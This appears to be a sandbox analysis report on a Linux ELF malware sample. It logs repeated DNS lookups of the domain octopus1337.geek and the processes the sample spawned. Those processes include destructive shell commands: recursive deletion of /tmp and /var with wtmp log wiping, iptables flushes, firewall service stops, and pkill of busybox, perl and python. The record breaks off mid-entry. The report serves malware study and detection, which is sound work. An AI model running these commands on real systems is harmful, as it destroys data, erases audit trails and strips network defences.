                                                                Oct 7, 2024 01:14:10.967576027 CEST5803653192.168.2.1351.254.162.59
                                                                Oct 7, 2024 01:14:11.159703016 CEST3592653192.168.2.1351.254.162.59
                                                                Oct 7, 2024 01:14:19.139369011 CEST4770153192.168.2.1381.169.136.222
                                                                Oct 7, 2024 01:14:19.168423891 CEST534770181.169.136.222192.168.2.13
                                                                Oct 7, 2024 01:14:19.357280016 CEST4271453192.168.2.1381.169.136.222
                                                                Oct 7, 2024 01:14:19.385508060 CEST534271481.169.136.222192.168.2.13
                                                                Oct 7, 2024 01:14:22.418284893 CEST4379053192.168.2.1394.16.114.254
                                                                Oct 7, 2024 01:14:22.430356979 CEST4873353192.168.2.1394.16.114.254
                                                                Oct 7, 2024 01:14:22.441334963 CEST4363853192.168.2.1394.16.114.254
                                                                Oct 7, 2024 01:14:22.452156067 CEST5528753192.168.2.1394.16.114.254
                                                                Oct 7, 2024 01:14:22.463887930 CEST4457853192.168.2.1394.16.114.254
                                                                Oct 7, 2024 01:14:22.614767075 CEST4230053192.168.2.1394.16.114.254
                                                                Oct 7, 2024 01:14:22.626732111 CEST6018853192.168.2.1394.16.114.254
                                                                Oct 7, 2024 01:14:25.672858953 CEST3587653192.168.2.13134.195.4.2
                                                                Oct 7, 2024 01:14:25.687236071 CEST5335876134.195.4.2192.168.2.13
                                                                Oct 7, 2024 01:14:27.285454988 CEST3758353192.168.2.13195.10.195.195
                                                                Oct 7, 2024 01:14:27.292820930 CEST5337583195.10.195.195192.168.2.13
                                                                Oct 7, 2024 01:14:27.631632090 CEST5619653192.168.2.1394.16.114.254
                                                                Oct 7, 2024 01:14:27.642848015 CEST5341953192.168.2.1394.16.114.254
                                                                Oct 7, 2024 01:14:27.653568029 CEST5477753192.168.2.1394.16.114.254
                                                                Oct 7, 2024 01:14:28.899187088 CEST5697653192.168.2.1351.254.162.59
                                                                Oct 7, 2024 01:14:30.841672897 CEST4513553192.168.2.13134.195.4.2
                                                                Oct 7, 2024 01:14:30.856724024 CEST5345135134.195.4.2192.168.2.13
                                                                Oct 7, 2024 01:14:32.548968077 CEST5468453192.168.2.13195.10.195.195
                                                                Oct 7, 2024 01:14:32.556324005 CEST5354684195.10.195.195192.168.2.13
                                                                Oct 7, 2024 01:14:33.903801918 CEST5847853192.168.2.1351.254.162.59
                                                                Oct 7, 2024 01:14:34.168286085 CEST3649953192.168.2.1351.254.162.59
                                                                Oct 7, 2024 01:14:38.907213926 CEST4248553192.168.2.1351.254.162.59
                                                                Oct 7, 2024 01:14:39.171196938 CEST4314753192.168.2.1351.254.162.59
                                                                Oct 7, 2024 01:14:43.912008047 CEST5018853192.168.2.1351.254.162.59
                                                                Oct 7, 2024 01:14:44.175151110 CEST6077053192.168.2.1351.254.162.59
                                                                Oct 7, 2024 01:14:48.916203022 CEST4708953192.168.2.1351.254.162.59
                                                                Oct 7, 2024 01:14:49.180237055 CEST3335153192.168.2.1351.254.162.59
                                                                TimestampSource IPDest IPChecksumCodeType
                                                                Oct 7, 2024 01:14:22.428438902 CEST94.16.114.254192.168.2.1390fc(Port unreachable)Destination Unreachable
                                                                Oct 7, 2024 01:14:22.440471888 CEST94.16.114.254192.168.2.1390fc(Port unreachable)Destination Unreachable
                                                                Oct 7, 2024 01:14:22.451247931 CEST94.16.114.254192.168.2.1390fc(Port unreachable)Destination Unreachable
                                                                Oct 7, 2024 01:14:22.462356091 CEST94.16.114.254192.168.2.1390fc(Port unreachable)Destination Unreachable
                                                                Oct 7, 2024 01:14:22.473664999 CEST94.16.114.254192.168.2.1390fc(Port unreachable)Destination Unreachable
                                                                Oct 7, 2024 01:14:22.625770092 CEST94.16.114.254192.168.2.1390fc(Port unreachable)Destination Unreachable
                                                                Oct 7, 2024 01:14:27.641761065 CEST94.16.114.254192.168.2.1390fc(Port unreachable)Destination Unreachable
                                                                Oct 7, 2024 01:14:27.652766943 CEST94.16.114.254192.168.2.1390fc(Port unreachable)Destination Unreachable
                                                                Oct 7, 2024 01:14:27.663589001 CEST94.16.114.254192.168.2.1390fc(Port unreachable)Destination Unreachable
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Oct 7, 2024 01:12:54.260118008 CEST192.168.2.13178.254.22.1660x13cdStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:12:54.682182074 CEST192.168.2.13178.254.22.1660x13cdStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:12:59.268496990 CEST192.168.2.13178.254.22.1660x13cdStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:12:59.690359116 CEST192.168.2.13178.254.22.1660x13cdStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:13:04.272105932 CEST192.168.2.13178.254.22.1660x13cdStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:13:04.696006060 CEST192.168.2.13178.254.22.1660x13cdStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:13:09.275377989 CEST192.168.2.13178.254.22.1660x13cdStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:13:09.701647997 CEST192.168.2.13178.254.22.1660x13cdStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:13:14.279406071 CEST192.168.2.13178.254.22.1660x13cdStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:13:14.707361937 CEST192.168.2.13178.254.22.1660x13cdStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:13:20.869074106 CEST192.168.2.1381.169.136.2220xfef6Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:13:21.313589096 CEST192.168.2.1381.169.136.2220xfef6Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:13:22.502372980 CEST192.168.2.1351.254.162.590xda8Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:13:22.944632053 CEST192.168.2.1351.254.162.590xda8Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:13:27.507249117 CEST192.168.2.1351.254.162.590xda8Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:13:27.947137117 CEST192.168.2.1351.254.162.590xda8Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:13:32.511687994 CEST192.168.2.1351.254.162.590xda8Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:13:32.951416016 CEST192.168.2.1351.254.162.590xda8Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:13:37.515214920 CEST192.168.2.1351.254.162.590xda8Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:13:37.953008890 CEST192.168.2.1351.254.162.590xda8Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:13:42.517524958 CEST192.168.2.1351.254.162.590xda8Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:13:42.955636978 CEST192.168.2.1351.254.162.590xda8Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:13:50.951791048 CEST192.168.2.1351.254.162.590x669fStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:13:51.143393040 CEST192.168.2.1351.254.162.590x669fStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:13:55.956660032 CEST192.168.2.1351.254.162.590x669fStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:13:56.147526979 CEST192.168.2.1351.254.162.590x669fStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:14:00.959481955 CEST192.168.2.1351.254.162.590x669fStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:14:01.152087927 CEST192.168.2.1351.254.162.590x669fStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:14:05.965243101 CEST192.168.2.1351.254.162.590x669fStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:14:06.156385899 CEST192.168.2.1351.254.162.590x669fStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:14:10.967576027 CEST192.168.2.1351.254.162.590x669fStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:14:11.159703016 CEST192.168.2.1351.254.162.590x669fStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:14:19.139369011 CEST192.168.2.1381.169.136.2220xe9a0Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:14:19.357280016 CEST192.168.2.1381.169.136.2220xe9a0Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:14:22.418284893 CEST192.168.2.1394.16.114.2540xc8aeStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:14:22.430356979 CEST192.168.2.1394.16.114.2540xc8aeStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:14:22.441334963 CEST192.168.2.1394.16.114.2540xc8aeStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:14:22.452156067 CEST192.168.2.1394.16.114.2540xc8aeStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:14:22.463887930 CEST192.168.2.1394.16.114.2540xc8aeStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:14:22.614767075 CEST192.168.2.1394.16.114.2540xc8aeStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:14:22.626732111 CEST192.168.2.1394.16.114.2540xc8aeStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:14:25.672858953 CEST192.168.2.13134.195.4.20x49bcStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:14:27.285454988 CEST192.168.2.13195.10.195.1950xe03aStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:14:27.631632090 CEST192.168.2.1394.16.114.2540xc8aeStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:14:27.642848015 CEST192.168.2.1394.16.114.2540xc8aeStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:14:27.653568029 CEST192.168.2.1394.16.114.2540xc8aeStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:14:28.899187088 CEST192.168.2.1351.254.162.590x2e55Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:14:30.841672897 CEST192.168.2.13134.195.4.20x49bcStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:14:32.548968077 CEST192.168.2.13195.10.195.1950xe03aStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:14:33.903801918 CEST192.168.2.1351.254.162.590x2e55Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:14:34.168286085 CEST192.168.2.1351.254.162.590x2e55Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:14:38.907213926 CEST192.168.2.1351.254.162.590x2e55Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:14:39.171196938 CEST192.168.2.1351.254.162.590x2e55Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:14:43.912008047 CEST192.168.2.1351.254.162.590x2e55Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:14:44.175151110 CEST192.168.2.1351.254.162.590x2e55Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:14:48.916203022 CEST192.168.2.1351.254.162.590x2e55Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:14:49.180237055 CEST192.168.2.1351.254.162.590x2e55Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Oct 7, 2024 01:13:20.896717072 CEST81.169.136.222192.168.2.130xfef6No error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:13:21.341346979 CEST81.169.136.222192.168.2.130xfef6No error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:14:19.168423891 CEST81.169.136.222192.168.2.130xe9a0No error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:14:19.385508060 CEST81.169.136.222192.168.2.130xe9a0No error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:14:25.687236071 CEST134.195.4.2192.168.2.130x49bcNo error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:14:27.292820930 CEST195.10.195.195192.168.2.130xe03aNo error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:14:30.856724024 CEST134.195.4.2192.168.2.130x49bcNo error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:14:32.556324005 CEST195.10.195.195192.168.2.130xe03aNo error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false

                                                                System Behavior

                                                                Start time (UTC):23:12:28
                                                                Start date (UTC):06/10/2024
                                                                Path:/tmp/HNzkADzkE2.elf
                                                                Arguments:/tmp/HNzkADzkE2.elf
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                Start time (UTC):23:12:29
                                                                Start date (UTC):06/10/2024
                                                                Path:/tmp/HNzkADzkE2.elf
                                                                Arguments:-
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                Start time (UTC):23:12:29
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/* /var/log/wtmp"
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:29
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:29
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/bin/rm
                                                                Arguments:rm -rf /tmp/HNzkADzkE2.elf /tmp/config-err-IN1GlB /tmp/dmesgtail.log /tmp/hsperfdata_root /tmp/snap-private-tmp /tmp/snap.lxd /tmp/ssh-ntFb5z3TQVeu /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-ModemManager.service-rehHTg /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-colord.service-PB7Ovf /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-fwupd.service-XwDkMg /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-switcheroo-control.service-jxKacf /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-logind.service-WfFmsi /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-resolved.service-9mYjrg /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-timedated.service-wDpo1e /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-upower.service-VKEayg /tmp/vmware-root_727-4290690966 /var/backups /var/cache /var/crash /var/lib /var/local /var/lock /var/log /var/mail /var/metrics /var/opt /var/run /var/snap /var/spool /var/tmp /var/run/NetworkManager /var/run/acpid.pid /var/run/acpid.socket /var/run/apport.lock /var/run/avahi-daemon /var/run/blkid /var/run/cloud-init /var/run/console-setup /var/run/crond.pid /var/run/crond.reboot /var/run/cryptsetup /var/run/cups /var/run/dbus /var/run/dmeventd-client /var/run/dmeventd-server /var/run/gdm3 /var/run/gdm3.pid /var/run/initctl /var/run/initramfs /var/run/irqbalance /var/run/lock /var/run/log /var/run/lvm /var/run/mono-xsp4 /var/run/mono-xsp4.pid /var/run/motd.d /var/run/mount /var/run/multipathd.pid /var/run/netns /var/run/network /var/run/screen /var/run/sendsigs.omit.d /var/run/shm /var/run/snapd /var/run/snapd-snap.socket /var/run/snapd.socket /var/run/speech-dispatcher /var/run/spice-vdagentd /var/run/sshd /var/run/sshd.pid /var/run/sudo /var/run/systemd /var/run/tmpfiles.d /var/run/udev /var/run/udisks2 /var/run/unattended-upgrades.lock /var/run/user /var/run/utmp /var/run/uuidd /var/run/vmware /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-ModemManager.service-rJRv0g /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-colord.service-2NWDdf /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-fwupd.service-FOsKgj /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-switcheroo-control.service-YlFEtg /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-logind.service-VhFl6g /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-resolved.service-GDC7pj /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-timedated.service-k0Nyjf /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-upower.service-FqJmSi /var/log/wtmp
                                                                File size:72056 bytes
                                                                MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                Start time (UTC):23:12:34
                                                                Start date (UTC):06/10/2024
                                                                Path:/tmp/HNzkADzkE2.elf
                                                                Arguments:-
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                Start time (UTC):23:12:34
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:sh -c "rm -rf /tmp/*"
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:34
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:34
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/bin/rm
                                                                Arguments:rm -rf /tmp/*
                                                                File size:72056 bytes
                                                                MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                Start time (UTC):23:12:34
                                                                Start date (UTC):06/10/2024
                                                                Path:/tmp/HNzkADzkE2.elf
                                                                Arguments:-
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                Start time (UTC):23:12:34
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:sh -c "iptables -F"
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:34
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:34
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/sbin/iptables
                                                                Arguments:iptables -F
                                                                File size:99296 bytes
                                                                MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                Start time (UTC):23:12:34
                                                                Start date (UTC):06/10/2024
                                                                Path:/tmp/HNzkADzkE2.elf
                                                                Arguments:-
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                Start time (UTC):23:12:34
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:sh -c "pkill -9 busybox"
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:34
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:34
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/bin/pkill
                                                                Arguments:pkill -9 busybox
                                                                File size:30968 bytes
                                                                MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                                Start time (UTC):23:12:36
                                                                Start date (UTC):06/10/2024
                                                                Path:/tmp/HNzkADzkE2.elf
                                                                Arguments:-
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                Start time (UTC):23:12:36
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:sh -c "pkill -9 perl"
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:36
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:36
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/bin/pkill
                                                                Arguments:pkill -9 perl
                                                                File size:30968 bytes
                                                                MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                                Start time (UTC):23:12:38
                                                                Start date (UTC):06/10/2024
                                                                Path:/tmp/HNzkADzkE2.elf
                                                                Arguments:-
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                Start time (UTC):23:12:38
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:sh -c "pkill -9 python"
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:38
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:38
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/bin/pkill
                                                                Arguments:pkill -9 python
                                                                File size:30968 bytes
                                                                MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                                Start time (UTC):23:12:40
                                                                Start date (UTC):06/10/2024
                                                                Path:/tmp/HNzkADzkE2.elf
                                                                Arguments:-
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                Start time (UTC):23:12:40
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:sh -c "service iptables stop"
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:40
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:40
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/sbin/service
                                                                Arguments:service iptables stop
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:40
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/sbin/service
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:40
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/bin/basename
                                                                Arguments:basename /usr/sbin/service
                                                                File size:39256 bytes
                                                                MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                                Start time (UTC):23:12:40
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/sbin/service
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:40
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/bin/basename
                                                                Arguments:basename /usr/sbin/service
                                                                File size:39256 bytes
                                                                MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                                Start time (UTC):23:12:40
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/sbin/service
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:40
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/bin/systemctl
                                                                Arguments:systemctl --quiet is-active multi-user.target
                                                                File size:996584 bytes
                                                                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                Start time (UTC):23:12:40
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/sbin/service
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:40
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/sbin/service
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:40
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/bin/systemctl
                                                                Arguments:systemctl list-unit-files --full --type=socket
                                                                File size:996584 bytes
                                                                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                Start time (UTC):23:12:40
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/sbin/service
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:40
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/bin/sed
                                                                Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                                                                File size:121288 bytes
                                                                MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                                Start time (UTC):23:12:42
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/bin/systemctl
                                                                Arguments:systemctl stop iptables.service
                                                                File size:996584 bytes
                                                                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                Start time (UTC):23:12:42
                                                                Start date (UTC):06/10/2024
                                                                Path:/tmp/HNzkADzkE2.elf
                                                                Arguments:-
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                Start time (UTC):23:12:42
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:sh -c "/sbin/iptables -F; /sbin/iptables -X"
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:42
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:42
                                                                Start date (UTC):06/10/2024
                                                                Path:/sbin/iptables
                                                                Arguments:/sbin/iptables -F
                                                                File size:99296 bytes
                                                                MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                Start time (UTC):23:12:42
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:42
                                                                Start date (UTC):06/10/2024
                                                                Path:/sbin/iptables
                                                                Arguments:/sbin/iptables -X
                                                                File size:99296 bytes
                                                                MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                Start time (UTC):23:12:42
                                                                Start date (UTC):06/10/2024
                                                                Path:/tmp/HNzkADzkE2.elf
                                                                Arguments:-
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                Start time (UTC):23:12:42
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:sh -c "service firewall stop"
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:42
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:42
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/sbin/service
                                                                Arguments:service firewall stop
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:42
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/sbin/service
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:42
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/bin/basename
                                                                Arguments:basename /usr/sbin/service
                                                                File size:39256 bytes
